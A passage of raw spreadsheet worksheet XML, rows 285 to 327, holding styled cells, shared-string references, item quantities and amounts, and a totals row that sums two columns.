        <v>1280</v>
      </c>
      <c r="K285" s="26"/>
      <c r="L285" s="25"/>
      <c r="M285" s="25"/>
      <c r="N285" s="47"/>
      <c r="O285" s="47"/>
      <c r="P285" s="47"/>
      <c r="Q285" s="47"/>
      <c r="R285" s="47"/>
      <c r="S285" s="47"/>
      <c r="T285" s="47"/>
      <c r="U285" s="47"/>
      <c r="V285" s="47"/>
      <c r="W285" s="47"/>
      <c r="X285" s="47"/>
      <c r="Y285" s="47"/>
      <c r="Z285" s="47"/>
      <c r="AA285" s="47"/>
      <c r="AB285" s="47"/>
      <c r="AC285" s="47"/>
      <c r="AD285" s="47"/>
      <c r="AE285" s="47"/>
      <c r="AF285" s="47"/>
      <c r="AG285" s="47"/>
    </row>
    <row r="286" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A286" s="25"/>
      <c r="B286" s="36">
        <v>409</v>
      </c>
      <c r="C286" s="36"/>
      <c r="D286" s="63" t="s">
        <v>4636</v>
      </c>
      <c r="E286" s="63"/>
      <c r="F286" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G286" s="26">
        <v>1</v>
      </c>
      <c r="H286" s="26"/>
      <c r="I286" s="26"/>
      <c r="J286" s="50">
        <v>160</v>
      </c>
      <c r="K286" s="26"/>
      <c r="L286" s="25"/>
      <c r="M286" s="25"/>
      <c r="N286" s="47"/>
      <c r="O286" s="47"/>
      <c r="P286" s="47"/>
      <c r="Q286" s="47"/>
      <c r="R286" s="47"/>
      <c r="S286" s="47"/>
      <c r="T286" s="47"/>
      <c r="U286" s="47"/>
      <c r="V286" s="47"/>
      <c r="W286" s="47"/>
      <c r="X286" s="47"/>
      <c r="Y286" s="47"/>
      <c r="Z286" s="47"/>
      <c r="AA286" s="47"/>
      <c r="AB286" s="47"/>
      <c r="AC286" s="47"/>
      <c r="AD286" s="47"/>
      <c r="AE286" s="47"/>
      <c r="AF286" s="47"/>
      <c r="AG286" s="47"/>
    </row>
    <row r="287" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A287" s="25"/>
      <c r="B287" s="36">
        <v>410</v>
      </c>
      <c r="C287" s="36"/>
      <c r="D287" s="63" t="s">
        <v>4638</v>
      </c>
      <c r="E287" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F287" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G287" s="26">
        <v>1</v>
      </c>
      <c r="H287" s="26"/>
      <c r="I287" s="26"/>
      <c r="J287" s="50">
        <v>1760</v>
      </c>
      <c r="K287" s="26"/>
      <c r="L287" s="25"/>
      <c r="M287" s="25"/>
      <c r="N287" s="47"/>
      <c r="O287" s="47"/>
      <c r="P287" s="47"/>
      <c r="Q287" s="47"/>
      <c r="R287" s="47"/>
      <c r="S287" s="47"/>
      <c r="T287" s="47"/>
      <c r="U287" s="47"/>
      <c r="V287" s="47"/>
      <c r="W287" s="47"/>
      <c r="X287" s="47"/>
      <c r="Y287" s="47"/>
      <c r="Z287" s="47"/>
      <c r="AA287" s="47"/>
      <c r="AB287" s="47"/>
      <c r="AC287" s="47"/>
      <c r="AD287" s="47"/>
      <c r="AE287" s="47"/>
      <c r="AF287" s="47"/>
      <c r="AG287" s="47"/>
    </row>
    <row r="288" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A288" s="25"/>
      <c r="B288" s="36">
        <v>411</v>
      </c>
      <c r="C288" s="36"/>
      <c r="D288" s="63" t="s">
        <v>4637</v>
      </c>
      <c r="E288" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F288" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G288" s="23">
        <v>1</v>
      </c>
      <c r="H288" s="36"/>
      <c r="I288" s="76"/>
      <c r="J288" s="50">
        <v>1920</v>
      </c>
      <c r="K288" s="26"/>
      <c r="L288" s="25"/>
      <c r="M288" s="25"/>
      <c r="N288" s="47"/>
      <c r="O288" s="47"/>
      <c r="P288" s="83"/>
    </row>
    <row r="289" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A289" s="25"/>
      <c r="B289" s="36">
        <v>412</v>
      </c>
      <c r="C289" s="36"/>
      <c r="D289" s="63" t="s">
        <v>4635</v>
      </c>
      <c r="E289" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F289" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G289" s="26">
        <v>1</v>
      </c>
      <c r="H289" s="26"/>
      <c r="I289" s="26"/>
      <c r="J289" s="50">
        <v>240</v>
      </c>
      <c r="L289" s="25"/>
      <c r="M289" s="25"/>
      <c r="N289" s="47"/>
      <c r="O289" s="47"/>
      <c r="P289" s="83"/>
    </row>
    <row r="290" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A290" s="25"/>
      <c r="B290" s="36"/>
      <c r="C290" s="36"/>
      <c r="D290" s="63"/>
      <c r="E290" s="63"/>
      <c r="F290" s="26"/>
      <c r="G290" s="26"/>
      <c r="H290" s="26"/>
      <c r="I290" s="26"/>
      <c r="J290" s="50">
        <v>0</v>
      </c>
      <c r="L290" s="25"/>
      <c r="M290" s="25"/>
      <c r="N290" s="47"/>
      <c r="O290" s="47"/>
      <c r="P290" s="83"/>
    </row>
    <row r="291" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A291" s="25"/>
      <c r="B291" s="36"/>
      <c r="C291" s="36"/>
      <c r="D291" s="66"/>
      <c r="E291" s="66"/>
      <c r="H291" s="36"/>
      <c r="I291" s="76"/>
      <c r="J291" s="50">
        <v>0</v>
      </c>
      <c r="K291" s="26"/>
      <c r="L291" s="25"/>
      <c r="M291" s="25"/>
      <c r="N291" s="47"/>
      <c r="O291" s="47"/>
      <c r="P291" s="83"/>
    </row>
    <row r="292" customHeight="1" spans="1:16">
      <c r="A292" s="25"/>
      <c r="B292" s="78" t="s">
        <v>1360</v>
      </c>
      <c r="C292" s="78"/>
      <c r="D292" s="79"/>
      <c r="E292" s="66"/>
      <c r="F292" s="23"/>
      <c r="G292" s="80">
        <v>565</v>
      </c>
      <c r="H292" s="76"/>
      <c r="I292" s="76">
        <f>SUM(I7:I291)</f>
        <v>41320542.6</v>
      </c>
      <c r="J292" s="52">
        <f>SUM(J7:J291)</f>
        <v>7791679.2</v>
      </c>
      <c r="K292" s="26"/>
      <c r="L292" s="25"/>
      <c r="M292" s="25"/>
      <c r="N292" s="25"/>
      <c r="O292" s="25"/>
      <c r="P292" s="30"/>
    </row>
    <row r="293" customHeight="1" spans="1:16">
      <c r="A293" s="25"/>
      <c r="B293" s="25"/>
      <c r="C293" s="25"/>
      <c r="D293" s="81"/>
      <c r="E293" s="81"/>
      <c r="F293" s="25"/>
      <c r="G293" s="41"/>
      <c r="H293" s="25"/>
      <c r="I293" s="58"/>
      <c r="J293" s="84"/>
      <c r="K293" s="25"/>
      <c r="L293" s="25"/>
      <c r="M293" s="25"/>
      <c r="N293" s="25"/>
      <c r="O293" s="25"/>
      <c r="P293" s="30"/>
    </row>
    <row r="294" customHeight="1" spans="1:16">
      <c r="A294" s="25"/>
      <c r="B294" s="25"/>
      <c r="C294" s="25"/>
      <c r="D294" s="81"/>
      <c r="E294" s="81"/>
      <c r="F294" s="25"/>
      <c r="G294" s="41"/>
      <c r="H294" s="25"/>
      <c r="I294" s="25"/>
      <c r="J294" s="84"/>
      <c r="K294" s="25"/>
      <c r="L294" s="25"/>
      <c r="M294" s="25"/>
      <c r="N294" s="25"/>
      <c r="O294" s="25"/>
      <c r="P294" s="30"/>
    </row>
    <row r="295" customHeight="1" spans="1:16">
      <c r="A295" s="25"/>
      <c r="B295" s="25"/>
      <c r="C295" s="25"/>
      <c r="D295" s="81"/>
      <c r="E295" s="81"/>
      <c r="F295" s="25"/>
      <c r="G295" s="41"/>
      <c r="H295" s="25"/>
      <c r="I295" s="25"/>
      <c r="J295" s="84"/>
      <c r="K295" s="25"/>
      <c r="L295" s="25"/>
      <c r="M295" s="25"/>
      <c r="N295" s="25"/>
      <c r="O295" s="25"/>
      <c r="P295" s="30"/>
    </row>
    <row r="296" customHeight="1" spans="1:16">
      <c r="A296" s="25"/>
      <c r="B296" s="25"/>
      <c r="C296" s="25"/>
      <c r="D296" s="81"/>
      <c r="E296" s="81"/>
      <c r="F296" s="25"/>
      <c r="G296" s="41"/>
      <c r="H296" s="25"/>
      <c r="I296" s="25"/>
      <c r="J296" s="84"/>
      <c r="K296" s="25"/>
      <c r="L296" s="25"/>
      <c r="M296" s="25"/>
      <c r="N296" s="25"/>
      <c r="O296" s="25"/>
      <c r="P296" s="30"/>
    </row>
    <row r="297" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A297" s="25"/>
      <c r="B297" s="25"/>
      <c r="C297" s="25"/>
      <c r="D297" s="81"/>
      <c r="E297" s="81"/>
      <c r="F297" s="25"/>
      <c r="G297" s="41"/>
      <c r="H297" s="25"/>
      <c r="I297" s="25"/>
      <c r="J297" s="84"/>
      <c r="K297" s="54"/>
      <c r="L297" s="25"/>
      <c r="M297" s="25"/>
      <c r="N297" s="47"/>
      <c r="O297" s="47"/>
      <c r="P297" s="47"/>
      <c r="Q297" s="47"/>
      <c r="R297" s="47"/>
      <c r="S297" s="47"/>
      <c r="T297" s="47"/>
      <c r="U297" s="47"/>
      <c r="V297" s="47"/>
      <c r="W297" s="47"/>
      <c r="X297" s="47"/>
      <c r="Y297" s="47"/>
      <c r="Z297" s="47"/>
      <c r="AA297" s="47"/>
      <c r="AB297" s="47"/>
      <c r="AC297" s="47"/>
      <c r="AD297" s="47"/>
      <c r="AE297" s="47"/>
      <c r="AF297" s="47"/>
      <c r="AG297" s="47"/>
    </row>
    <row r="298" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A298" s="25"/>
      <c r="B298" s="25"/>
      <c r="C298" s="25"/>
      <c r="D298" s="81"/>
      <c r="E298" s="81"/>
      <c r="F298" s="25"/>
      <c r="G298" s="41"/>
      <c r="H298" s="25"/>
      <c r="I298" s="55"/>
      <c r="J298" s="84"/>
      <c r="K298" s="25"/>
      <c r="L298" s="25"/>
      <c r="M298" s="25"/>
      <c r="N298" s="47"/>
      <c r="O298" s="47"/>
      <c r="P298" s="47"/>
      <c r="Q298" s="47"/>
      <c r="R298" s="47"/>
      <c r="S298" s="47"/>
      <c r="T298" s="47"/>
      <c r="U298" s="47"/>
      <c r="V298" s="47"/>
      <c r="W298" s="47"/>
      <c r="X298" s="47"/>
      <c r="Y298" s="47"/>
      <c r="Z298" s="47"/>
      <c r="AA298" s="47"/>
      <c r="AB298" s="47"/>
      <c r="AC298" s="47"/>
      <c r="AD298" s="47"/>
      <c r="AE298" s="47"/>
      <c r="AF298" s="47"/>
      <c r="AG298" s="47"/>
    </row>
    <row r="299" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A299" s="25"/>
      <c r="B299" s="25"/>
      <c r="C299" s="25"/>
      <c r="D299" s="81"/>
      <c r="E299" s="81"/>
      <c r="F299" s="25"/>
      <c r="G299" s="41"/>
      <c r="H299" s="25"/>
      <c r="I299" s="25"/>
      <c r="J299" s="84"/>
      <c r="K299" s="25"/>
      <c r="L299" s="25"/>
      <c r="M299" s="25"/>
      <c r="N299" s="47"/>
      <c r="O299" s="47"/>
      <c r="P299" s="47"/>
      <c r="Q299" s="47"/>
      <c r="R299" s="47"/>
      <c r="S299" s="47"/>
      <c r="T299" s="47"/>
      <c r="U299" s="47"/>
      <c r="V299" s="47"/>
      <c r="W299" s="47"/>
      <c r="X299" s="47"/>
      <c r="Y299" s="47"/>
      <c r="Z299" s="47"/>
      <c r="AA299" s="47"/>
      <c r="AB299" s="47"/>
      <c r="AC299" s="47"/>
      <c r="AD299" s="47"/>
      <c r="AE299" s="47"/>
      <c r="AF299" s="47"/>
      <c r="AG299" s="47"/>
    </row>
    <row r="300" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A300" s="25"/>
      <c r="B300" s="25"/>
      <c r="C300" s="25"/>
      <c r="D300" s="81"/>
      <c r="E300" s="81"/>
      <c r="F300" s="25"/>
      <c r="G300" s="41"/>
      <c r="H300" s="25"/>
      <c r="I300" s="25"/>
      <c r="J300" s="84"/>
      <c r="K300" s="25"/>
      <c r="L300" s="25"/>
      <c r="M300" s="25"/>
      <c r="N300" s="47"/>
      <c r="O300" s="47"/>
      <c r="P300" s="83"/>
    </row>
    <row r="301" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A301" s="25"/>
      <c r="B301" s="25"/>
      <c r="C301" s="25"/>
      <c r="D301" s="81"/>
      <c r="E301" s="81"/>
      <c r="F301" s="25"/>
      <c r="G301" s="41"/>
      <c r="H301" s="25"/>
      <c r="I301" s="25"/>
      <c r="J301" s="84"/>
      <c r="K301" s="54"/>
      <c r="L301" s="25"/>
      <c r="M301" s="25"/>
      <c r="N301" s="47"/>
      <c r="O301" s="47"/>
      <c r="P301" s="83"/>
    </row>
    <row r="302" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A302" s="25"/>
      <c r="B302" s="25"/>
      <c r="C302" s="25"/>
      <c r="D302" s="81"/>
      <c r="E302" s="81"/>
      <c r="F302" s="25"/>
      <c r="G302" s="41"/>
      <c r="H302" s="25"/>
      <c r="I302" s="25"/>
      <c r="J302" s="84"/>
      <c r="K302" s="25"/>
      <c r="L302" s="25"/>
      <c r="M302" s="25"/>
      <c r="N302" s="47"/>
      <c r="O302" s="47"/>
      <c r="P302" s="83"/>
    </row>
    <row r="303" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A303" s="25"/>
      <c r="B303" s="25"/>
      <c r="C303" s="25"/>
      <c r="D303" s="81"/>
      <c r="E303" s="81"/>
      <c r="F303" s="25"/>
      <c r="G303" s="41"/>
      <c r="H303" s="25"/>
      <c r="I303" s="25"/>
      <c r="J303" s="84"/>
      <c r="K303" s="25"/>
      <c r="L303" s="25"/>
      <c r="M303" s="25"/>
      <c r="N303" s="47"/>
      <c r="O303" s="47"/>
      <c r="P303" s="83"/>
    </row>
    <row r="304" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A304" s="25"/>
      <c r="B304" s="25"/>
      <c r="C304" s="25"/>
      <c r="D304" s="81"/>
      <c r="E304" s="81"/>
      <c r="F304" s="25"/>
      <c r="G304" s="41"/>
      <c r="H304" s="25"/>
      <c r="I304" s="25"/>
      <c r="J304" s="84"/>
      <c r="K304" s="25"/>
      <c r="L304" s="25"/>
      <c r="M304" s="25"/>
      <c r="N304" s="47"/>
      <c r="O304" s="47"/>
      <c r="P304" s="83"/>
    </row>
    <row r="305" customHeight="1" spans="1:16">
      <c r="A305" s="25"/>
      <c r="B305" s="25"/>
      <c r="C305" s="25"/>
      <c r="D305" s="81"/>
      <c r="E305" s="81"/>
      <c r="F305" s="25"/>
      <c r="G305" s="41"/>
      <c r="H305" s="25"/>
      <c r="I305" s="25"/>
      <c r="J305" s="84"/>
      <c r="K305" s="25"/>
      <c r="L305" s="25"/>
      <c r="M305" s="25"/>
      <c r="N305" s="25"/>
      <c r="O305" s="25"/>
      <c r="P305" s="30"/>
    </row>
    <row r="306" customHeight="1" spans="1:16">
      <c r="A306" s="25"/>
      <c r="B306" s="25"/>
      <c r="C306" s="25"/>
      <c r="D306" s="81"/>
      <c r="E306" s="81"/>
      <c r="F306" s="25"/>
      <c r="G306" s="41"/>
      <c r="H306" s="25"/>
      <c r="I306" s="25"/>
      <c r="J306" s="84"/>
      <c r="K306" s="25"/>
      <c r="L306" s="25"/>
      <c r="M306" s="25"/>
      <c r="N306" s="25"/>
      <c r="O306" s="25"/>
      <c r="P306" s="30"/>
    </row>
    <row r="307" customHeight="1" spans="1:16">
      <c r="A307" s="25"/>
      <c r="B307" s="25"/>
      <c r="C307" s="25"/>
      <c r="D307" s="81"/>
      <c r="E307" s="81"/>
      <c r="F307" s="25"/>
      <c r="G307" s="41"/>
      <c r="H307" s="25"/>
      <c r="I307" s="25"/>
      <c r="J307" s="84"/>
      <c r="K307" s="25"/>
      <c r="L307" s="25"/>
      <c r="M307" s="25"/>
      <c r="N307" s="25"/>
      <c r="O307" s="25"/>
      <c r="P307" s="30"/>
    </row>
    <row r="308" customHeight="1" spans="1:16">
      <c r="A308" s="25"/>
      <c r="B308" s="25"/>
      <c r="C308" s="25"/>
      <c r="D308" s="81"/>
      <c r="E308" s="81"/>
      <c r="F308" s="25"/>
      <c r="G308" s="41"/>
      <c r="H308" s="25"/>
      <c r="I308" s="25"/>
      <c r="J308" s="84"/>
      <c r="K308" s="25"/>
      <c r="L308" s="25"/>
      <c r="M308" s="25"/>
      <c r="N308" s="25"/>
      <c r="O308" s="25"/>
      <c r="P308" s="30"/>
    </row>
    <row r="309" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A309" s="25"/>
      <c r="B309" s="42"/>
      <c r="C309" s="43"/>
      <c r="D309" s="82"/>
      <c r="E309" s="82"/>
      <c r="F309" s="25"/>
      <c r="G309" s="41"/>
      <c r="H309" s="43"/>
      <c r="I309" s="56"/>
      <c r="J309" s="84"/>
      <c r="K309" s="25"/>
      <c r="L309" s="25"/>
      <c r="M309" s="25"/>
      <c r="N309" s="47"/>
      <c r="O309" s="47"/>
      <c r="P309" s="47"/>
      <c r="Q309" s="47"/>
      <c r="R309" s="47"/>
      <c r="S309" s="47"/>
      <c r="T309" s="47"/>
      <c r="U309" s="47"/>
      <c r="V309" s="47"/>
      <c r="W309" s="47"/>
      <c r="X309" s="47"/>
      <c r="Y309" s="47"/>
      <c r="Z309" s="47"/>
      <c r="AA309" s="47"/>
      <c r="AB309" s="47"/>
      <c r="AC309" s="47"/>
      <c r="AD309" s="47"/>
      <c r="AE309" s="47"/>
      <c r="AF309" s="47"/>
      <c r="AG309" s="47"/>
    </row>
    <row r="310" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A310" s="25"/>
      <c r="B310" s="42"/>
      <c r="C310" s="43"/>
      <c r="D310" s="82"/>
      <c r="E310" s="82"/>
      <c r="F310" s="25"/>
      <c r="G310" s="41"/>
      <c r="H310" s="43"/>
      <c r="I310" s="56"/>
      <c r="J310" s="84"/>
      <c r="K310" s="25"/>
      <c r="L310" s="25"/>
      <c r="M310" s="25"/>
      <c r="N310" s="47"/>
      <c r="O310" s="47"/>
      <c r="P310" s="47"/>
      <c r="Q310" s="47"/>
      <c r="R310" s="47"/>
      <c r="S310" s="47"/>
      <c r="T310" s="47"/>
      <c r="U310" s="47"/>
      <c r="V310" s="47"/>
      <c r="W310" s="47"/>
      <c r="X310" s="47"/>
      <c r="Y310" s="47"/>
      <c r="Z310" s="47"/>
      <c r="AA310" s="47"/>
      <c r="AB310" s="47"/>
      <c r="AC310" s="47"/>
      <c r="AD310" s="47"/>
      <c r="AE310" s="47"/>
      <c r="AF310" s="47"/>
      <c r="AG310" s="47"/>
    </row>
    <row r="311" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A311" s="25"/>
      <c r="B311" s="42"/>
      <c r="C311" s="43"/>
      <c r="D311" s="82"/>
      <c r="E311" s="82"/>
      <c r="F311" s="25"/>
      <c r="G311" s="41"/>
      <c r="H311" s="43"/>
      <c r="I311" s="56"/>
      <c r="J311" s="84"/>
      <c r="K311" s="25"/>
      <c r="L311" s="25"/>
      <c r="M311" s="25"/>
      <c r="N311" s="47"/>
      <c r="O311" s="47"/>
      <c r="P311" s="47"/>
      <c r="Q311" s="47"/>
      <c r="R311" s="47"/>
      <c r="S311" s="47"/>
      <c r="T311" s="47"/>
      <c r="U311" s="47"/>
      <c r="V311" s="47"/>
      <c r="W311" s="47"/>
      <c r="X311" s="47"/>
      <c r="Y311" s="47"/>
      <c r="Z311" s="47"/>
      <c r="AA311" s="47"/>
      <c r="AB311" s="47"/>
      <c r="AC311" s="47"/>
      <c r="AD311" s="47"/>
      <c r="AE311" s="47"/>
      <c r="AF311" s="47"/>
      <c r="AG311" s="47"/>
    </row>
    <row r="312" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A312" s="25"/>
      <c r="B312" s="42"/>
      <c r="C312" s="43"/>
      <c r="D312" s="82"/>
      <c r="E312" s="82"/>
      <c r="F312" s="25"/>
      <c r="G312" s="41"/>
      <c r="H312" s="43"/>
      <c r="I312" s="56"/>
      <c r="J312" s="84"/>
      <c r="K312" s="25"/>
      <c r="L312" s="25"/>
      <c r="M312" s="25"/>
      <c r="N312" s="47"/>
      <c r="O312" s="47"/>
      <c r="P312" s="83"/>
    </row>
    <row r="313" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A313" s="25"/>
      <c r="B313" s="42"/>
      <c r="C313" s="43"/>
      <c r="D313" s="82"/>
      <c r="E313" s="82"/>
      <c r="F313" s="25"/>
      <c r="G313" s="41"/>
      <c r="H313" s="43"/>
      <c r="I313" s="56"/>
      <c r="J313" s="84"/>
      <c r="K313" s="25"/>
      <c r="L313" s="25"/>
      <c r="M313" s="25"/>
      <c r="N313" s="47"/>
      <c r="O313" s="47"/>
      <c r="P313" s="83"/>
    </row>
    <row r="314" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A314" s="25"/>
      <c r="B314" s="42"/>
      <c r="C314" s="43"/>
      <c r="D314" s="82"/>
      <c r="E314" s="82"/>
      <c r="F314" s="25"/>
      <c r="G314" s="41"/>
      <c r="H314" s="43"/>
      <c r="I314" s="56"/>
      <c r="J314" s="84"/>
      <c r="K314" s="25"/>
      <c r="L314" s="25"/>
      <c r="M314" s="25"/>
      <c r="N314" s="47"/>
      <c r="O314" s="47"/>
      <c r="P314" s="83"/>
    </row>
    <row r="315" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A315" s="25"/>
      <c r="B315" s="42"/>
      <c r="C315" s="43"/>
      <c r="D315" s="82"/>
      <c r="E315" s="82"/>
      <c r="F315" s="25"/>
      <c r="G315" s="41"/>
      <c r="H315" s="43"/>
      <c r="I315" s="56"/>
      <c r="J315" s="84"/>
      <c r="K315" s="25"/>
      <c r="L315" s="25"/>
      <c r="M315" s="25"/>
      <c r="N315" s="47"/>
      <c r="O315" s="47"/>
      <c r="P315" s="83"/>
    </row>
    <row r="316" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A316" s="25"/>
      <c r="B316" s="42"/>
      <c r="C316" s="43"/>
      <c r="D316" s="82"/>
      <c r="E316" s="82"/>
      <c r="F316" s="25"/>
      <c r="G316" s="41"/>
      <c r="H316" s="43"/>
      <c r="I316" s="56"/>
      <c r="J316" s="84"/>
      <c r="K316" s="25"/>
      <c r="L316" s="25"/>
      <c r="M316" s="25"/>
      <c r="N316" s="47"/>
      <c r="O316" s="47"/>
      <c r="P316" s="83"/>
    </row>
    <row r="317" customHeight="1" spans="1:16">
      <c r="A317" s="25"/>
      <c r="B317" s="42"/>
      <c r="C317" s="43"/>
      <c r="D317" s="82"/>
      <c r="E317" s="82"/>
      <c r="F317" s="25"/>
      <c r="G317" s="41"/>
      <c r="H317" s="43"/>
      <c r="I317" s="56"/>
      <c r="J317" s="84"/>
      <c r="K317" s="25"/>
      <c r="L317" s="25"/>
      <c r="M317" s="25"/>
      <c r="N317" s="25"/>
      <c r="O317" s="25"/>
      <c r="P317" s="30"/>
    </row>
    <row r="318" customHeight="1" spans="1:16">
      <c r="A318" s="25"/>
      <c r="B318" s="42"/>
      <c r="C318" s="43"/>
      <c r="D318" s="82"/>
      <c r="E318" s="82"/>
      <c r="F318" s="25"/>
      <c r="G318" s="41"/>
      <c r="H318" s="43"/>
      <c r="I318" s="56"/>
      <c r="J318" s="84"/>
      <c r="K318" s="25"/>
      <c r="L318" s="25"/>
      <c r="M318" s="25"/>
      <c r="N318" s="25"/>
      <c r="O318" s="25"/>
      <c r="P318" s="30"/>
    </row>
    <row r="319" customHeight="1" spans="1:16">
      <c r="A319" s="25"/>
      <c r="B319" s="42"/>
      <c r="C319" s="43"/>
      <c r="D319" s="82"/>
      <c r="E319" s="82"/>
      <c r="F319" s="25"/>
      <c r="G319" s="41"/>
      <c r="H319" s="43"/>
      <c r="I319" s="56"/>
      <c r="J319" s="84"/>
      <c r="K319" s="25"/>
      <c r="L319" s="25"/>
      <c r="M319" s="25"/>
      <c r="N319" s="25"/>
      <c r="O319" s="25"/>
      <c r="P319" s="30"/>
    </row>
    <row r="320" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A320" s="25"/>
      <c r="B320" s="42"/>
      <c r="C320" s="43"/>
      <c r="D320" s="82"/>
      <c r="E320" s="82"/>
      <c r="F320" s="25"/>
      <c r="G320" s="41"/>
      <c r="H320" s="43"/>
      <c r="I320" s="56"/>
      <c r="J320" s="84"/>
      <c r="K320" s="25"/>
      <c r="L320" s="25"/>
      <c r="M320" s="25"/>
      <c r="N320" s="47"/>
      <c r="O320" s="47"/>
      <c r="P320" s="47"/>
      <c r="Q320" s="47"/>
      <c r="R320" s="47"/>
      <c r="S320" s="47"/>
      <c r="T320" s="47"/>
      <c r="U320" s="47"/>
      <c r="V320" s="47"/>
      <c r="W320" s="47"/>
      <c r="X320" s="47"/>
      <c r="Y320" s="47"/>
      <c r="Z320" s="47"/>
      <c r="AA320" s="47"/>
      <c r="AB320" s="47"/>
      <c r="AC320" s="47"/>
      <c r="AD320" s="47"/>
      <c r="AE320" s="47"/>
      <c r="AF320" s="47"/>
      <c r="AG320" s="47"/>
    </row>
    <row r="321" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A321" s="25"/>
      <c r="B321" s="42"/>
      <c r="C321" s="43"/>
      <c r="D321" s="82"/>
      <c r="E321" s="85"/>
      <c r="F321" s="25"/>
      <c r="G321" s="41"/>
      <c r="H321" s="43"/>
      <c r="I321" s="56"/>
      <c r="J321" s="84"/>
      <c r="K321" s="25"/>
      <c r="L321" s="25"/>
      <c r="M321" s="25"/>
      <c r="N321" s="47"/>
      <c r="O321" s="47"/>
      <c r="P321" s="47"/>
      <c r="Q321" s="47"/>
      <c r="R321" s="47"/>
      <c r="S321" s="47"/>
      <c r="T321" s="47"/>
      <c r="U321" s="47"/>
      <c r="V321" s="47"/>
      <c r="W321" s="47"/>
      <c r="X321" s="47"/>
      <c r="Y321" s="47"/>
      <c r="Z321" s="47"/>
      <c r="AA321" s="47"/>
      <c r="AB321" s="47"/>
      <c r="AC321" s="47"/>
      <c r="AD321" s="47"/>
      <c r="AE321" s="47"/>
      <c r="AF321" s="47"/>
      <c r="AG321" s="47"/>
    </row>
    <row r="322" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A322" s="25"/>
      <c r="B322" s="42"/>
      <c r="C322" s="43"/>
      <c r="D322" s="82"/>
      <c r="E322" s="82"/>
      <c r="F322" s="25"/>
      <c r="G322" s="41"/>
      <c r="H322" s="43"/>
      <c r="I322" s="56"/>
      <c r="J322" s="84"/>
      <c r="K322" s="25"/>
      <c r="L322" s="25"/>
      <c r="M322" s="25"/>
      <c r="N322" s="47"/>
      <c r="O322" s="47"/>
      <c r="P322" s="47"/>
      <c r="Q322" s="47"/>
      <c r="R322" s="47"/>
      <c r="S322" s="47"/>
      <c r="T322" s="47"/>
      <c r="U322" s="47"/>
      <c r="V322" s="47"/>
      <c r="W322" s="47"/>
      <c r="X322" s="47"/>
      <c r="Y322" s="47"/>
      <c r="Z322" s="47"/>
      <c r="AA322" s="47"/>
      <c r="AB322" s="47"/>
      <c r="AC322" s="47"/>
      <c r="AD322" s="47"/>
      <c r="AE322" s="47"/>
      <c r="AF322" s="47"/>
      <c r="AG322" s="47"/>
    </row>
    <row r="323" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A323" s="25"/>
      <c r="B323" s="42"/>
      <c r="C323" s="43"/>
      <c r="D323" s="82"/>
      <c r="E323" s="82"/>
      <c r="F323" s="25"/>
      <c r="G323" s="41"/>
      <c r="H323" s="43"/>
      <c r="I323" s="56"/>
      <c r="J323" s="84"/>
      <c r="K323" s="25"/>
      <c r="L323" s="25"/>
      <c r="M323" s="25"/>
      <c r="N323" s="47"/>
      <c r="O323" s="47"/>
      <c r="P323" s="83"/>
    </row>
    <row r="324" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A324" s="25"/>
      <c r="B324" s="42"/>
      <c r="C324" s="43"/>
      <c r="D324" s="82"/>
      <c r="E324" s="82"/>
      <c r="F324" s="25"/>
      <c r="G324" s="41"/>
      <c r="H324" s="43"/>
      <c r="I324" s="56"/>
      <c r="J324" s="84"/>
      <c r="K324" s="25"/>
      <c r="L324" s="25"/>
      <c r="M324" s="25"/>
      <c r="N324" s="47"/>
      <c r="O324" s="47"/>
      <c r="P324" s="83"/>
    </row>
    <row r="325" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A325" s="25"/>
      <c r="B325" s="42"/>
      <c r="C325" s="43"/>
      <c r="D325" s="82"/>
      <c r="E325" s="82"/>
      <c r="F325" s="25"/>
      <c r="G325" s="41"/>
      <c r="H325" s="43"/>
      <c r="I325" s="56"/>
      <c r="J325" s="84"/>
      <c r="K325" s="25"/>
      <c r="L325" s="25"/>
      <c r="M325" s="25"/>
      <c r="N325" s="47"/>
      <c r="O325" s="47"/>
      <c r="P325" s="83"/>
    </row>
    <row r="326" customHeight="1" spans="1:16">
      <c r="A326" s="25"/>
      <c r="B326" s="42"/>
      <c r="C326" s="43"/>
      <c r="D326" s="82"/>
      <c r="E326" s="82"/>
      <c r="F326" s="25"/>
      <c r="G326" s="41"/>
      <c r="H326" s="43"/>
      <c r="I326" s="56"/>
      <c r="J326" s="84"/>
      <c r="K326" s="25"/>
      <c r="L326" s="25"/>
      <c r="M326" s="25"/>
      <c r="N326" s="25"/>
      <c r="O326" s="25"/>
      <c r="P326" s="30"/>
    </row>
    <row r="327" customHeight="1" spans="1:16">
      <c r="A327" s="25"/>
      <c r="B327" s="42"/>
